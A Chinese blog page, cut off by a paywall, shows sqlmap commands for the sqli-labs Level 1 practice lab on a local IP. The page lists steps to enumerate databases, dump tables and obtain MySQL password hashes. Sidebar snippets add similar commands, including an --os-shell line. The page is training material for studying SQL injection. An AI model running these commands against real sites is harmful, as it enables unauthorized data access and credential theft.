sqlmap过sqli-labs-master以第一关为例

最新推荐文章于 2024-05-01 07:57:08 发布
最新推荐文章于 2024-05-01 07:57:08 发布
阅读量703 收藏 4
点赞数 1
文章标签: mysql sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yj959595/article/details/118567039
版权

先把需要用到的命令列一下,方便使用。

sqlmap -u 注入点 –dbs  暴库

sqlmap -u 注入点 –current-user   当前使用的账户

数据库账户与密码

sqlmap -u 注入点 –passwords   mysql的登录账户和密码

列出数据库中的表

sqlmap -u 注入点 -D 指定数据库名 –tables  kaishi(-D指定数据库名称)

列出表中字段

sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 –columns

爆字段内容

sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword”

开始 sqlmap -u "http://192.168.140.128/sqli-labs-master/Less-1/?id=1" --dbs

这样,所有的数据库就被爆出来了。

接下来查看我们所在的数据库

sqlmap -u "http://192.168.140.128/sqli-labs-master/Less-1/?id=1" --dbms=mysql --current-db

接下来查看数据库中的表

最低0.47元/天 解锁文章
momo36D
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmapSQLi-LABS靶场 11-20关
小明师傅博客
06-05 3631
第11关 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12关 一模一样 第13关 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14关 一模一样 15关 一模一样 16关-20关 都
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8057
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqli-labs-master第一关
weixin_44932880的博客
07-20 1957
本篇是我做完第一题后的一些理解 首先将我了解的数据库的一些内容说一下 一个账户可以有多个数据库,每个数据库里可以建多个表,表里用字段来储存信息。 如图,localhost为本地账户,security等是数据库,security下面的emails等为表格, 而右边的id,email_id则为字段,字段下面就是储存的信息。 ...
2024年最全网络安全-sqlmap实战之sqlilabs-Less12
最新发布
2401_84300128的博客
05-01 362
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!不使用–batch了,有些默认选项他选的不是很好,导致比较慢。对于从来没有接触过网络安全的同学,我们帮你准备了详细的。内容实在太多,不一一截图了。
sqli第一关
qq_62673514的博客
02-17 125
sqli第一个攻略
048 SQL注入实验——sqli-labs-mastersqlmap自动化
鸡蛋炒鸡蛋
03-03 1532
文章目录一:sqli-labs-master的部署二:sqli注入通关2.1:笔记篇2.2:实操过程less-01less-02less-03less-04less-05less-06less-07less-08less-09三:sqlmap自动化注入 一:sqli-labs-master的部署 这里给到大家一个下载地址: sqli-labs-master (访问密码:zUw77A) 下载之后解压之后得到一个文件 把该文件夹放到已经安装好的phpstudy/www文件目录下 如何安装phpstudy,请参
sqli-labs-master.zip
05-26
Sqli-labs是专为学习SQL注入而设计的实战教程,由印度程序员创建,提供了一系列逐步升级的挑战,帮助用户从基础到高级理解SQL注入的原理和防御方法。在这个"SQL注入教程"中,你可以通过参与不同级别的实验,深入理解...
sqli-labs(php7.3以上可运行)
01-29
"sqli-labs"是一个专为学习和测试SQL注入漏洞而设计的开源平台,尤其适用于PHP7.3及更高版本的环境。 一、SQL注入基础 SQL注入是由于应用程序没有正确地过滤或验证用户输入的数据,导致这些数据可以直接被解释为SQL...
sqli-labs.rar
12-22
此外,随着你逐渐熟悉sqli-labs中的挑战,你可以尝试使用自动化工具sqlmap进行自动化注入测试,这将帮助你理解攻击者可能使用的工具和技术。 最后,别忘了实践是最好的老师。完成sqli-labs的所有挑战后,你应该对...
sqli-labs-master
08-22
sqli-labs-master是一个专为学习和实践SQL注入漏洞利用而设计的代码环境。这个项目提供了一系列逐步升级的练习,帮助用户了解SQL注入的工作原理、检测方法以及如何修复这些漏洞。 在sqli-labs-master中,你可以探索...
sqli-labs第五关详解附加sqlmap使用
告白的博客
07-05 1683
0x00 判断注入类型 首先还是像之前一样判断注入类型,字段长度以及错误回显等,在这一关发现无论怎么输入函数,永远只显示相同画面,错误输入则不显示,从此判断出这里不在使用联合注入查询,因为数据库不会回显输出字符,输出结果只存在0和1,程序已经禁止了数据库信息的返回显示。这是我们就要尝试进行盲注,可以尝试布尔型盲注、报错注入、时间延迟型盲注。这类型手工注入工程量很大,所以建议大家使用sqlmap,直接利用工具进行注入。 0x01 手工注入 1.采用布尔型注入 使用left(database(),n)函数猜
sqlmap-master.zip
03-01
sqlmapsql注入中的常用工具,为了提高渗透效率,本人加入了一些字典。希望你们有字典加入到其中。
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
sqli-labs闯关1-1
Darklord.W
06-30 450
sqli-labs闯关1-1 在线练习网址http://43.247.91.228:84/ 首先,进入sqli-labs 1-1 输入http://43.247.91.228:84/Less-1/?id=1 输入http://43.247.91.228:84/Less-1/?id=1’ 用and1=1和and1=2,结果显示它为字符型注入 http://43.247.91.228:84/Less-...
sqli-labs第一关:有回显位的提示信息注入
m0_51395584的博客
02-14 611
sqli-labs第一关:有回显位的提示信息注入 (一到四关的注入方式类似,只是SQL语句的闭合方式不同) 第一步:直接输入网址: 127.0.0.1/sqli-labs-master/Less-1/ 第二步:设置id=1,确定是否与数据库有交互 127.0.0.1/sqli-labs-master/Less-1/?id=1 第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示 http:
sqlmap学习(sqli-labs为示例)
quan9i的博客
02-17 4229
文章目录前言sql-map部分指令- -is-dba- -current-D,-T,-C- -dump-v--batchget类型检测可注入类型获取数据库获取获取列名获取字段信息post类型准备工作检测可注入类型破解数据库方法一方法二破解数据表方法一方法二获取列名方法一方法二获取字段信息方法一方法二 前言 由于python学的啥也不是,脚本写的也很不咋滴(不会写),因此来学习sqlmap的使用,本人只是小白,如果出现错误还请各位师傅多多指正。 sql-map部分指令 - -is-dba --is-dba判
sqlmapsqli-labs靶场第一关
01-06
以下是使用sqlmapsqli-labs靶场第一关的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值